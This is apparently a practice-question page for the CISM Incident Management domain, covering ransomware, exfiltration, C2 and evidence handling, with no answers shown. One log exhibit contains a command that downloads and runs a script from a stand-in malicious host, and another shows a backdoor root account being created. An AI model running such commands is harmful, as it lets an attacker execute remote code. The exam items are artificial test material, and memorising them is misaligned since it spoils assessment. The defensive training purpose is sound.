Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

← Incident Management practice sets

CISM Incident Management • Complete Question Bank

CISM Incident Management — All Questions With Answers

Complete CISM Incident Management question bank — all 0 questions with answers and detailed explanations.

176
Questions
Free
No signup
Certifications/CISM/Practice Test/Incident Management/All Questions
Question 1mediummultiple choice
Read the full NAT/PAT explanation →

A multinational corporation has just detected a ransomware attack that encrypted critical files on a file server. The incident response team has been activated. Which of the following should be the FIRST action taken by the team?

Question 2hardmultiple choice
Read the full DNS explanation →

During an incident investigation, the security team discovers that an attacker exfiltrated sensitive customer data via encrypted DNS tunneling over a period of three months. The data loss was only noticed after a routine audit. Which of the following weaknesses MOST likely allowed the attacker to remain undetected for so long?

Question 3easymultiple choice
Read the full Incident Management explanation →

An organization's incident response plan includes a step to 'contain the incident.' Which of the following actions is an example of containment?

Question 4mediummultiple choice
Read the full Incident Management explanation →

During a simulated phishing exercise, several employees clicked a link and entered their credentials on a fake login page. The security team needs to determine the impact. Which of the following should be the NEXT step?

Question 5hardmultiple choice
Read the full Incident Management explanation →

An organization is developing an incident response plan. The CISO wants to ensure that the plan aligns with industry best practices. Which framework should the CISO use as a primary reference?

Question 6easymultiple choice
Read the full Incident Management explanation →

After a security incident, the incident response team prepares a report detailing the root cause, impact, and lessons learned. Who is the PRIMARY audience for this report?

Question 7mediummultiple choice
Read the full Incident Management explanation →

During an incident, the response team collects volatile data from a compromised server. Which of the following should be collected FIRST to minimize loss of evidence?

Question 8hardmultiple choice
Read the full Incident Management explanation →

An organization uses a SIEM to correlate security events. The SIEM generates an alert for a possible brute-force attack against an admin account. The incident response team reviews the alert and finds that the account is a service account with a known password. What should the team do NEXT?

Question 9easymultiple choice
Read the full Incident Management explanation →

Which of the following is the PRIMARY purpose of an incident response plan?

Question 10mediummultiple choice
Read the full Incident Management explanation →

A security analyst detects unusual outbound network traffic from a database server to an unknown IP address. The traffic uses encrypted connections on port 443. Which type of attack is MOST likely occurring?

Question 11hardmultiple choice
Read the full Incident Management explanation →

During an incident investigation, the team discovers that an attacker used a valid user's credentials to access a sensitive database. The user's account had multi-factor authentication (MFA) enabled. How is this MOST likely possible?

Question 12mediummulti select
Read the full Incident Management explanation →

Which TWO of the following are key indicators of a potential insider threat incident? (Select exactly 2)

Question 13hardmulti select
Read the full Incident Management explanation →

Which THREE of the following are essential components of an incident response plan? (Select exactly 3)

Question 14easymulti select
Read the full Incident Management explanation →

Which TWO of the following are best practices for preserving digital evidence during an incident? (Select exactly 2)

Question 15mediummulti select
Read the full Incident Management explanation →

Which THREE of the following are common challenges in incident response? (Select exactly 3)

Question 16mediummultiple choice
Read the full Incident Management explanation →

Based on the SIEM alert exhibit, which immediate action should the incident responder take?

Exhibit

Refer to the exhibit.

```
[Alert] Correlation Rule: Multiple Failed Logins
Source IP: 10.0.0.55
Destination IP: 192.168.1.10
Event Count: 150 failed logins to admin account 'jsmith' within 5 minutes
Action: Triggered
```
Question 17hardmultiple choice
Read the full Incident Management explanation →

Given the exhibit output from a web server, which connection is MOST suspicious and likely indicates a command-and-control (C2) channel?

Exhibit

Refer to the exhibit.

```
# netstat -an | grep :443
tcp4  0      0  *.443                 *.*                    LISTEN
tcp4  0      0  192.168.1.100.443     10.0.0.1.54321        ESTABLISHED
tcp4  0      0  192.168.1.100.443     10.0.0.2.54322        ESTABLISHED
tcp4  0      0  192.168.1.100.443     203.0.113.5.44333     ESTABLISHED
```
Question 18easymultiple choice
Read the full Incident Management explanation →

Based on the incident response policy exhibit, which phase should include notifying external stakeholders such as law enforcement?

Exhibit

Refer to the exhibit.

```
Policy: IncidentResponse
- Phase: Detection
  - Action: Alert security team
- Phase: Analysis
  - Action: Determine scope and impact
- Phase: Containment
  - Action: Isolate affected systems
- Phase: Eradication
  - Action: Remove malware
- Phase: Recovery
  - Action: Restore from backup
- Phase: Post-Incident
  - Action: Conduct lessons learned
```
Question 19hardmultiple choice
Read the full Incident Management explanation →

You are the incident response manager for a financial services company. The company has a hybrid infrastructure with on-premises servers and cloud services. At 2:00 AM, the SIEM generates a critical alert: a database server in the DMZ is communicating with a known malicious IP address on port 443. The server contains customer PII. The on-call security analyst reports that the server is running and the connection is active. The incident response plan states that any confirmed compromise of PII must be reported to the regulator within 72 hours. You have the following options: A) Immediately isolate the server by disconnecting it from the network, then begin forensic analysis. B) Leave the server connected to gather more intelligence about the attacker's actions, but block only the malicious IP at the firewall. C) Shut down the server to preserve evidence and prevent data exfiltration. D) Copy the server's disk over the network for forensic analysis before taking any action. Which option is the BEST course of action?

Question 20mediummultiple choice
Read the full Incident Management explanation →

You are a security analyst for a mid-sized e-commerce company. The company uses a cloud-based email service. Several employees report receiving phishing emails that appear to come from the CEO, asking them to purchase gift cards. The emails have a spoofed sender address but pass SPF and DKIM checks because the attacker compromised a legitimate email account. The CEO's account has been locked, but the attacker may have set up forwarding rules. You need to ensure the attacker cannot use the account further. You have the following options: A) Change the CEO's password and enable MFA, then remove any forwarding rules. B) Delete the CEO's email account and create a new one. C) Block all emails from the CEO's email address at the gateway. D) Restore the CEO's mailbox from a backup taken before the compromise. Which option is the BEST course of action?

Question 21easymultiple choice
Read the full Incident Management explanation →

An analyst receives an alert indicating a potential data exfiltration. The alert shows a host IP address 10.10.50.200 sending large amounts of data to an external IP address 203.0.113.5 over port 443. What should the analyst do FIRST?

Question 22mediummultiple choice
Read the full Incident Management explanation →

A financial institution is designing an incident response plan. They want to ensure that during a ransomware incident, critical transaction systems can be restored within 4 hours. Which metric should be used to measure this requirement?

Question 23hardmultiple choice
Read the full Incident Management explanation →

After a security incident, the incident response team identifies that the root cause was a phishing email that bypassed the email filter. The email contained a malicious macro that executed PowerShell commands. Which control would be MOST effective in preventing similar incidents in the future?

Question 24easymultiple choice
Read the full Incident Management explanation →

During an incident, the CIRT leader decides to contain a compromised server by disconnecting it from the network. However, this action may result in loss of volatile forensics data. What should the CIRT leader do?

Question 25mediummultiple choice
Read the full Incident Management explanation →

An organization has a mature incident management process. After a major incident, they conduct a post-incident review. Which activity is MOST important during this review?

Question 26mediummulti select
Read the full Incident Management explanation →

Which TWO actions are appropriate during the containment phase of an incident involving a malware outbreak on multiple workstations?

Question 27hardmulti select
Read the full Incident Management explanation →

Which THREE elements should be included in an incident response plan to ensure effective communication during a security incident?

Question 28easymultiple choice
Read the full Incident Management explanation →

Refer to the exhibit. The security analyst observes these alerts. What is the MOST likely sequence of events?

Exhibit

Refer to the exhibit.

---
Incident Log:
[2025-03-20 08:15:23] ALERT: Multiple failed logins for user 'jsmith' from IP 10.0.0.45
[2025-03-20 08:16:01] ALERT: Successful login for user 'jsmith' from IP 10.0.0.45
[2025-03-20 08:20:45] ALERT: Unusual outbound connection from host 10.0.0.45 to 198.51.100.10:4444
[2025-03-20 08:22:30] ALERT: Large data transfer from host 10.0.0.45 to 198.51.100.10
---
Question 29mediummultiple choice
Read the full Ansible explanation →

Refer to the exhibit. During a ransomware incident, the response team discovers that the backup server is also encrypted. Which phase of the playbook is MOST impacted?

Exhibit

Refer to the exhibit.

---
Incident Response Playbook: Ransomware
Phase 1: Identification - Confirm ransomware via user reports and endpoint alerts.
Phase 2: Containment - Disconnect affected systems from the network. Do not power off.
Phase 3: Eradication - Remove malware using approved tools; reimage if necessary.
Phase 4: Recovery - Restore data from clean backups; verify integrity.
Phase 5: Post-Incident - Conduct lessons learned.
---
Question 30hardmultiple choice
Read the full NAT/PAT explanation →

You are the incident response manager for a mid-sized e-commerce company. At 2:00 PM, the security operations center receives an alert from the intrusion detection system indicating a potential SQL injection attack against the customer database server. The server hosts a critical database containing customer PII and payment card data. The alert shows multiple suspicious queries from an internal IP address 192.168.10.50, which belongs to the development team's jump box. The development team uses this jump box to access production servers for maintenance. The jump box is managed by the IT operations team. The CEO is currently in a meeting with investors and cannot be disturbed. The CISO is on leave. The company has a written incident response plan that designates the IT director as the incident response coordinator in the absence of the CISO. The IT director has limited security knowledge. The database administrator (DBA) reports that the database is experiencing high CPU usage and that some customer records appear to have been modified. You need to take immediate action. What should you do FIRST?

Question 31mediummultiple choice
Read the full Incident Management explanation →

During a ransomware incident, the incident response team identifies that the encryption process is still ongoing. The CISO decides to isolate affected systems to prevent further spread. Which of the following is the MOST appropriate next step?

Question 32easymultiple choice
Read the full Incident Management explanation →

An organization's security monitoring system detects multiple failed login attempts from an internal IP address to a critical database server. The attempts are occurring every few seconds. What is the FIRST step the incident response team should take?

Question 33hardmultiple choice
Read the full Incident Management explanation →

After a major security incident, the incident response team completes the containment, eradication, and recovery phases. The CISO is now planning the post-incident activities. Which activity is MOST critical to ensure that lessons learned are effectively incorporated?

Question 34easymultiple choice
Read the full NAT/PAT explanation →

An organization has an incident response plan that designates a primary and alternate incident response team. During a simulated ransomware attack, the primary team is unavailable. What should the alternate team do FIRST?

Question 35hardmultiple choice
Read the full Incident Management explanation →

A financial institution has a mature incident response program. During a security incident, the incident response team identifies that a business-critical application is affected. The team must decide whether to continue containing the incident or allow limited operations to continue. Which factor should be given the HIGHEST priority?

Question 36mediummultiple choice
Read the full Incident Management explanation →

During an incident investigation, the forensic analyst discovers that a malware sample communicates with an external IP address. The organization's incident response plan requires a decision on whether to block the IP at the firewall. What should the incident response team do FIRST?

Question 37easymultiple choice
Read the full Incident Management explanation →

An incident response team discovers that an employee's workstation is infected with malware. The workstation contains sensitive customer data. Which of the following is the MOST appropriate containment strategy?

Question 38hardmultiple choice
Read the full Incident Management explanation →

A large enterprise experiences a data breach involving personal identifiable information (PII) of customers. The incident response team has contained the breach and is now in the eradication phase. The CISO wants to ensure that the same vulnerability cannot be exploited again. Which action is MOST critical?

Question 39mediummultiple choice
Read the full Incident Management explanation →

An organization's incident response team is notified of a potential denial-of-service (DoS) attack targeting their web application. The team suspects a distributed denial-of-service (DDoS) attack. What is the FIRST step the team should take?

Question 40mediummulti select
Read the full Incident Management explanation →

Which TWO of the following are key components of an effective incident response plan?

Question 41hardmulti select
Read the full Incident Management explanation →

Which THREE of the following are best practices for handling evidence during an incident investigation?

Question 42easymulti select
Read the full Incident Management explanation →

Which TWO of the following are indicators of a potential security incident?

Question 43mediummultiple choice
Read the full Incident Management explanation →

Based on the exhibit, what is the MOST likely scenario?

Exhibit

Refer to the exhibit.

Exhibit:

Event Log Entry:
Time: 2023-10-05 14:23:17
Event ID: 4625
Source: Security
User: SYSTEM
Logon Type: 3
Account Name: jdoe
Account Domain: CORP
Failure Reason: Unknown user name or bad password.
Workstation Name: WS-001
IP Address: 192.168.1.50

Event Log Entry:
Time: 2023-10-05 14:24:05
Event ID: 4624
Source: Security
User: SYSTEM
Logon Type: 3
Account Name: jdoe
Account Domain: CORP
Workstation Name: WS-001
IP Address: 192.168.1.50

Event Log Entry:
Time: 2023-10-05 14:25:10
Event ID: 4648
Source: Security
User: jdoe
Logon Type: 2
Account Name: jdoe
Account Domain: CORP
Target Server: FILE-SRV-01
Additional Info: A logon was attempted using explicit credentials.
Workstation Name: WS-001
IP Address: 192.168.1.50
Question 44hardmultiple choice
Read the full Incident Management explanation →

Based on the exhibit, what is the MOST likely issue?

Exhibit

Refer to the exhibit.

Exhibit:

Firewall Log:
Date Time Source IP Destination IP Port Protocol Action
2023-10-05 10:00:00 10.0.0.15 203.0.113.5 443 TCP ALLOW
2023-10-05 10:01:00 10.0.0.15 203.0.113.5 443 TCP ALLOW
2023-10-05 10:02:00 10.0.0.15 203.0.113.5 443 TCP ALLOW
... (repeated every minute)
2023-10-05 12:00:00 10.0.0.15 203.0.113.5 443 TCP ALLOW

IDS Alert:
Signature: ET TROJAN Win32/Malicious Beacon
Source IP: 10.0.0.15
Destination IP: 203.0.113.5
Time: 2023-10-05 10:00:00
Severity: High
Question 45easymultiple choice
Read the full Incident Management explanation →

Based on the exhibit, which role is responsible for notifying affected users about the phishing attack?

Exhibit

Refer to the exhibit.

Exhibit:

Incident Response Plan - Roles and Responsibilities:
- Incident Response Manager: Coordinates response efforts.
- Technical Lead: Performs technical analysis and containment.
- Legal Counsel: Advises on legal and regulatory obligations.
- Communications Lead: Manages internal and external communications.
- Human Resources: Handles employee-related matters if involved.
- IT Support: Provides technical assistance as needed.

Scenario: A phishing attack has compromised several user credentials. The incident response team has been activated.
Question 46hardmultiple choice
Read the full NAT/PAT explanation →

You are the incident response manager for a multinational corporation that processes sensitive financial data. The company has a mature security operations center (SOC) that monitors network traffic, endpoints, and cloud services. At 2:00 AM local time, the SOC alerts you to a critical incident: an internal server (IP 10.10.10.50) is communicating with an external IP address (198.51.100.23) known to be associated with a ransomware group. The server hosts a financial database that is replicated to a secondary site every 6 hours. The last successful replication was at 1:00 AM. The SOC has already isolated the server from the network by blocking its outbound traffic at the firewall. However, the server is still running. The initial investigation suggests that the communication started 30 minutes ago. The database contains customer PII and transactional data. Your incident response plan includes steps for containment, eradication, recovery, and post-incident review. The CEO is being notified and expects a recommendation on the best course of action. The company has a cyber insurance policy that requires timely notification and preservation of evidence. The legal department advises that any action that could destroy evidence must be carefully considered. Which of the following is the BEST course of action?

Question 47mediummultiple choice
Read the full NAT/PAT explanation →

You are the information security manager for a mid-sized e-commerce company. The company operates a web application that handles credit card transactions and stores customer data in a backend database. The incident response team has just been alerted to a potential data breach: an intrusion detection system (IDS) flagged a SQL injection attack pattern on the web application's login page. The attack originated from an external IP address (5.5.5.5) and appears to have been successful, as the IDS also detected a large outbound data transfer from the database server to another external IP (6.6.6.6) shortly after. The database server is not segmented from the web server. The company has a legal obligation to report breaches involving cardholder data within 72 hours. The incident response plan is being activated. The team includes a forensic analyst, a network engineer, and a legal advisor. The web application is currently running and serving customers. The CEO wants to minimize business disruption. Which of the following actions should the incident response team take FIRST?

Question 48mediummultiple choice
Read the full Incident Management explanation →

After a ransomware incident, the incident response team contains the spread and begins eradication. The team discovers that the ransomware encrypted files on a file server and also deleted shadow copies. Which of the following should the team do NEXT to support recovery?

Question 49hardmultiple choice
Read the full Incident Management explanation →

An organization's security team detects an unusual spike in outbound traffic from a database server to an external IP address during a routine security scan. The database server contains sensitive customer data. Which of the following is the MOST appropriate initial response?

Question 50easymultiple choice
Read the full Incident Management explanation →

During an incident investigation, the incident response team needs to collect volatile data from a compromised server. Which of the following data should be collected FIRST?

Question 51hardmulti select
Read the full Incident Management explanation →

A security analyst reviews the following alert from the SIEM: 'Multiple failed login attempts from IP 10.0.0.5 to the domain controller within 5 minutes.' Which TWO actions should the analyst take as part of initial incident response?

Question 52mediummultiple choice
Read the full Incident Management explanation →

Based on the exhibit, which of the following is the MOST likely attack vector?

Exhibit

Refer to the exhibit.

```
[2025-03-10 14:32:15] CRITICAL: File integrity violation on /etc/passwd
[2025-03-10 14:32:15] File: /etc/passwd, Expected hash: a1b2c3d4e5f6, Actual hash: 9z8y7x6w5v4u
[2025-03-10 14:32:16] ALERT: Unauthorized SSH key added to /home/admin/.ssh/authorized_keys
[2025-03-10 14:32:18] ALERT: New user 'backup_agent' created with UID 0
```
Question 53hardmultiple choice
Read the full Incident Management explanation →

You are the information security manager for a financial services company that processes credit card transactions. The company uses a mix of on-premises servers and cloud services. During a routine vulnerability scan, you discover that one of the web servers has been compromised with a web shell that allows remote command execution. The server is part of a cluster that handles customer-facing web traffic. The incident response team is activated. The team's immediate actions include isolating the server from the network and taking a forensic image. However, the server is critical for business operations, and management is pressuring you to restore service quickly. The server's logs show that the web shell was uploaded three days ago, and during that time, the server processed approximately 10,000 transactions. The team has not yet fully analyzed the forensic image. You need to decide on the next steps. What should you do FIRST?

Question 54mediumdrag order
Read the full Incident Management explanation →

Order the steps for a risk assessment process according to ISACA's risk management framework.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order
1Step 1
2Step 2
3Step 3
4Step 4
5Step 5
Question 55mediumdrag order
Read the full Incident Management explanation →

Order the steps for establishing a security incident response team (IRT).

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order
1Step 1
2Step 2
3Step 3
4Step 4
5Step 5
Question 56mediummatching
Read the full Incident Management explanation →

Match each incident management phase to its activity.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Develop incident response plan and train team

Identify and validate security incidents

Isolate threat, remove malware, restore operations

Conduct lessons learned and update procedures

Notify stakeholders and regulatory bodies

Question 57mediummatching
Read the full Incident Management explanation →

Match each data classification level to its handling requirement.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

No restrictions; can be freely distributed

Access limited to employees; no external sharing

Access on need-to-know basis; encryption required

Highly sensitive; strict access control and logging

Subject to legal/compliance requirements (e.g., PII)

Question 58easymultiple choice
Read the full Incident Management explanation →

A security analyst detects unusual outbound traffic from a critical server to an unknown external IP address during business hours. Which step should be taken FIRST in the incident response process?

Question 59easymultiple choice
Read the full Incident Management explanation →

During a post-incident review, the incident response team identifies that the root cause of a data breach was a misconfigured firewall rule that allowed unrestricted inbound access from the internet. Which corrective action BEST addresses this issue?

Question 60easymultiple choice
Read the full Incident Management explanation →

An organization's incident response plan (IRP) is being updated. Which stakeholder should be included in the IRP development to ensure legal and regulatory requirements are met?

Question 61mediummultiple choice
Read the full Incident Management explanation →

After detecting a ransomware infection on a file server, the incident response team performs containment and eradication. Which step should be prioritized during the recovery phase to minimize business impact?

Question 62mediummultiple choice
Read the full Incident Management explanation →

A company's incident response team uses a SIEM to detect security events. Which SIEM capability is MOST critical for early detection of a potential incident?

Question 63mediummultiple choice
Read the full Incident Management explanation →

During an incident, the incident response team determines that a compromised account was used to exfiltrate data. The account has been disabled. What is the NEXT best action to prevent similar incidents?

Question 64hardmultiple choice
Read the full NAT/PAT explanation →

An organization has a distributed incident response team across multiple time zones. During a critical incident, communication delays occur due to different work hours. Which strategy BEST improves coordination and response time?

Question 65hardmultiple choice
Read the full NAT/PAT explanation →

A security operations center (SOC) analyst receives an alert from the SIEM indicating a potential command and control (C2) communication. The alert is based on a signature that matches known C2 traffic. What is the MOST appropriate next step?

Question 66hardmultiple choice
Read the full Incident Management explanation →

During a security incident, the incident response team discovers that an attacker used a previously unknown vulnerability (zero-day) in a widely used software. Which action should the team take to address this vulnerability in the short term?

Question 67easymulti select
Read the full Incident Management explanation →

Which TWO of the following are primary goals of the containment phase in incident response? (Select TWO)

Question 68mediummulti select
Read the full Incident Management explanation →

Which THREE of the following are key components of an incident response plan? (Select THREE)

Question 69hardmulti select
Read the full Incident Management explanation →

Which TWO of the following are recommended practices when conducting a post-incident review? (Select TWO)

Question 70mediummultiple choice
Read the full Incident Management explanation →

After a ransomware attack, a company discovers that backups are also encrypted. The incident response team has isolated the affected systems. What should be the next step?

Question 71easymultiple choice
Read the full Incident Management explanation →

An organization's intrusion detection system alerts on a potential C2 communication from an internal host. Which phase of the incident response lifecycle should be initiated first?

Question 72hardmultiple choice
Read the full NAT/PAT explanation →

A multinational corporation experiences a security breach involving customer PII. The incident response team needs to determine notification requirements. Which factor is MOST important in deciding which regulatory bodies to inform?

Question 73mediummultiple choice
Read the full Incident Management explanation →

During incident response, a forensic investigator needs to collect evidence from a compromised server. Which action BEST preserves evidence integrity?

Question 74easymultiple choice
Read the full Incident Management explanation →

An incident response plan (IRP) is being tested. Which metric is MOST indicative of the team's effectiveness during an exercise?

Question 75hardmultiple choice
Read the full Incident Management explanation →

After a phishing attack, an organization's incident response team identifies that the attacker gained access to an email account and sent internal spear-phishing emails. What is the BEST immediate containment action?

Question 76mediummultiple choice
Read the full Incident Management explanation →

An organization's incident response team is conducting a lessons learned meeting after a major incident. Which outcome is MOST critical to document?

Question 77easymultiple choice
Read the full Incident Management explanation →

A security analyst notices unusual outbound traffic from a server that is not scheduled for any data transfers. Which step should the analyst take FIRST?

Question 78hardmultiple choice
Read the full Incident Management explanation →

During a security incident, the incident response team discovers that an attacker has exfiltrated data via an encrypted tunnel over HTTPS. Which log source is MOST likely to provide evidence of the exfiltration?

Question 79mediummulti select
Read the full Incident Management explanation →

Which TWO actions are key components of the 'Containment' phase in incident response?

Question 80hardmulti select
Read the full Incident Management explanation →

Which TWO criteria should an organization use to prioritize incidents during triage?

Question 81easymulti select
Read the full Incident Management explanation →

Which THREE steps are essential in the post-incident review process?

Question 82hardmultiple choice
Read the full Incident Management explanation →

Based on the exhibit, what is the MOST likely attack vector that led to the compromise?

Exhibit

Refer to the exhibit.

Exhibit: Syslog output from a compromised server:

Mar 15 10:23:45 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2
Mar 15 10:23:50 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2
... (repeated 100 times)
Mar 15 10:25:00 server1 kernel: nf_conntrack: table full, dropping packet.
Mar 15 10:25:02 server1 sshd[1235]: Accepted publickey for admin from 10.0.0.51 port 4444 ssh2
Mar 15 10:25:10 server1 bash: sudo: whoami
Mar 15 10:25:12 server1 bash: sudo: wget http://malicious.example.com/payload.sh
Mar 15 10:25:30 server1 bash: bash payload.sh
Question 83mediummultiple choice
Read the full Incident Management explanation →

Based on the exhibit, an incident involves unauthorized access to a file server containing corporate training videos. No sensitive data is stored there. Which priority should the incident be assigned?

Exhibit

Refer to the exhibit.

Exhibit: Incident response plan excerpt:

"\n Triage Priority Matrix:\n - Critical (C): PII or financial data affected, regulatory implications, widespread impact\n - High (H): Sensitive business data, limited user impact, potential for escalation\n - Medium (M): Internal operational data, no regulatory impact, isolated systems\n - Low (L): Low-value data, no sensitive information, easily restored\n"
Question 84easymultiple choice
Read the full Incident Management explanation →

Based on the exhibit, what is the PRIMARY risk of the automated response policy as configured?

Exhibit

Refer to the exhibit.

Exhibit: JSON policy snippet for an incident response automation:

{
  "policy_name": "Auto-Contain Malicious IP",
  "trigger": "SIEM_alert.severity >= 5",
  "actions": [
    {"action": "block_ip", "target": "alert.source_ip"},
    {"action": "isolate_host", "target": "alert.target_host"},
    {"action": "create_ticket", "assignee": "IR_team"}
  ],
  "notify": ["SOC_manager"],
  "auto_approve": true
}
Question 85easymultiple choice
Read the full Incident Management explanation →

A security analyst detects a potential data exfiltration from a critical server. According to incident response best practices, what is the first action the analyst should take?

Question 86mediummultiple choice
Read the full Incident Management explanation →

After containing an incident, the incident response team is ready to proceed. According to NIST SP 800-61, what is the next phase?

Question 87hardmultiple choice
Read the full Incident Management explanation →

An organization is compromised by an APT that has established multiple backdoors across the network. What is the most effective eradication strategy?

Question 88easymultiple choice
Read the full Incident Management explanation →

A small business without a dedicated incident response team experiences a suspected breach. Who should be primarily responsible for leading the incident response efforts?

Question 89mediummultiple choice
Read the full NAT/PAT explanation →

During an incident investigation, the response team discovers that the attacker exploited a known vulnerability for which a patch was available but not applied. What should be the team's primary focus during the recovery phase?

Question 90hardmultiple choice
Read the full NAT/PAT explanation →

A security operations center receives an alert from an IDS indicating possible command and control traffic. The analyst is unsure if it's a true positive. Which combination of actions should be taken first?

Question 91easymultiple choice
Read the full Incident Management explanation →

An organization has just experienced a ransomware attack that encrypted files on several file servers. The incident response team has contained the incident. What is the next critical step?

Question 92mediummultiple choice
Read the full Incident Management explanation →

During an incident, the incident response team discovers that the attacker used stolen credentials to access the network. What should the team do during the eradication phase?

Question 93hardmultiple choice
Read the full Incident Management explanation →

An organization is under a DDoS attack that is saturating their internet link. The incident response team needs to mitigate the attack. Which action should be taken first?

Question 94easymulti select
Read the full Incident Management explanation →

During the detection and analysis phase of incident response, which two activities are essential? (Choose two.)

Question 95mediummulti select
Read the full Incident Management explanation →

An incident response plan should include which three key components to ensure effective response? (Choose three.)

Question 96hardmulti select
Read the full Incident Management explanation →

An organization suspects a data breach. Which two actions should the incident response team take before notifying affected customers? (Choose two.)

Question 97mediummultiple choice
Read the full Incident Management explanation →

Given the exhibit, what is the most likely classification of this incident?

Exhibit

Refer to the exhibit.
Alert: 'Elevated number of failed logins from IP 10.0.0.5 to multiple user accounts on Domain Controller.'
Time: 2025-03-01 14:23:45
Additional details: 50 failed attempts in 30 seconds.
Question 98hardmultiple choice
Read the full Incident Management explanation →

Based on the configuration snippet, what is the expected behavior when an incident is triggered?

Exhibit

Refer to the exhibit.
```
[incident_response]
playbook = "playbook_standard"
priority_override = False
notification_email = "ir-team@company.com"
auto_contain = True
```
Question 99easymultiple choice
Read the full Incident Management explanation →

Based on the exhibit, what is the first action the incident response team should take?

Exhibit

Refer to the exhibit.
[2025-04-01 08:12:33] ERROR: Firewall rule 'Allow-Internal-Web' permit tcp 10.0.0.0/8 192.168.1.0/24 port 80
[2025-04-01 08:12:34] ALERT: IDS signature 'WEB-MISC cross-site scripting attempt' from 10.5.5.5 to 192.168.1.10:80
Question 100easymultiple choice
Read the full Incident Management explanation →

A security analyst receives an alert indicating a potential data exfiltration from a server. Which of the following should be the FIRST step in the incident response process?

Question 101easymultiple choice
Read the full Incident Management explanation →

During an incident, the incident response team needs to preserve evidence for legal proceedings. Which of the following is the MOST important action to take?

Question 102mediummultiple choice
Read the full Incident Management explanation →

An organization has multiple security tools that generate alerts. The incident response team is overwhelmed by the volume of alerts. Which of the following is the BEST approach to manage this issue?

Question 103mediummultiple choice
Read the full Incident Management explanation →

During an incident investigation, the team discovers that a compromised account was used to exfiltrate data. Which of the following should the team do NEXT?

Question 104hardmultiple choice
Read the full Incident Management explanation →

An organization has implemented a host-based intrusion prevention system (HIPS) on all endpoints. An internal audit reveals that many incidents go undetected because users often disable HIPS when it interferes with applications. Which of the following is the MOST effective control to address this issue?

Question 105hardmultiple choice
Read the full Incident Management explanation →

After a ransomware attack, the incident response team successfully restores systems from backups. However, the ransomware encrypts files that were modified after the last backup was taken. Which of the following is the BEST way to minimize future data loss?

Question 106easymultiple choice
Read the full Incident Management explanation →

An organization's incident response plan has not been updated in two years. Which of the following is the MOST likely consequence?

Question 107mediummultiple choice
Read the full Incident Management explanation →

During an incident, the team identifies that a contractor's credentials were used to access sensitive data. Which of the following should be the IMMEDIATE action?

Question 108hardmultiple choice
Read the full Incident Management explanation →

An organization's incident response team uses a SIEM system to correlate logs. A malicious insider is able to cover their tracks by deleting logs from the SIEM. Which of the following is the BEST preventive control?

Question 109mediummulti select
Read the full Incident Management explanation →

An organization experiences a data breach involving personal information. Which TWO actions should be taken as part of incident response? (Choose two.)

Question 110hardmulti select
Read the full Incident Management explanation →

An incident response team is analyzing a phishing email that successfully compromised a user's credentials. Which TWO indicators of compromise (IOCs) should the team prioritize collecting? (Choose two.)

Question 111easymulti select
Read the full Incident Management explanation →

Which THREE of the following are key phases of the incident management lifecycle according to NIST or ISO? (Choose three.)

Question 112mediummultiple choice
Read the full Incident Management explanation →

According to the exhibit, which role is responsible for conducting forensic analysis?

Exhibit

Refer to the exhibit.
[Incident Response Plan Roles]
Role: Incident Manager - Coordinates response
Role: Technical Lead - Performs analysis
Role: Communication Lead - Handles communications
Role: Legal Counsel - Provides legal guidance
Question 113hardmultiple choice
Read the full Incident Management explanation →

The SIEM alerts on this traffic. What should the incident analyst do FIRST?

Exhibit

Refer to the exhibit.
[Threat Intelligence Feed]
Indicator: 203.0.113.5
Type: IP
Confidence: High
Tags: C2, Malware
[Proxy Log]
src=10.0.1.50 dst=203.0.113.5 port=443 action=ALLOWED
Question 114easymultiple choice
Read the full Incident Management explanation →

Based on the exhibit, what is the MOST significant gap in incident management?

Exhibit

Refer to the exhibit.
[Incident Log Summary]
Date Range: 2024-01-01 to 2024-06-30
Total Incidents Reported: 120
Incidents with reported response time > 24 hours: 12
Incidents with no documentation: 45
Question 115easymultiple choice
Read the full Incident Management explanation →

A security analyst detects an unusual spike in outbound traffic from a database server. Which of the following is the FIRST step in the incident response process?

Question 116mediummultiple choice
Read the full Incident Management explanation →

During incident response, a team discovers that a phishing email successfully compromised a user's credentials. Which containment strategy would BEST limit further damage?

Question 117hardmultiple choice
Read the full Incident Management explanation →

An organization's IDS logs show multiple outbound connections to an external IP address from a server that normally communicates only internally. The logs indicate the process is running under the SYSTEM account. Which of the following BEST describes the likely root cause?

Question 118easymultiple choice
Read the full Incident Management explanation →

During an incident, the incident response team is communicating with affected stakeholders. According to best practices, which of the following should be communicated FIRST?

Question 119mediummultiple choice
Read the full Incident Management explanation →

A security operations center analyst receives an alert from the SIEM indicating a possible data exfiltration. The analyst is unsure if it is a true positive. What is the MOST appropriate action?

Question 120hardmultiple choice
Read the full Incident Management explanation →

An incident has been declared involving a ransomware attack that encrypted critical servers. The organization has backups, but the backups were also encrypted. Which of the following is the BEST course of action?

Question 121easymultiple choice
Read the full Incident Management explanation →

A user reports that their computer is behaving oddly, and an IT technician finds a suspicious file in the startup folder. The technician is not sure if this is an incident. What should the technician do FIRST?

Question 122mediummultiple choice
Read the full Incident Management explanation →

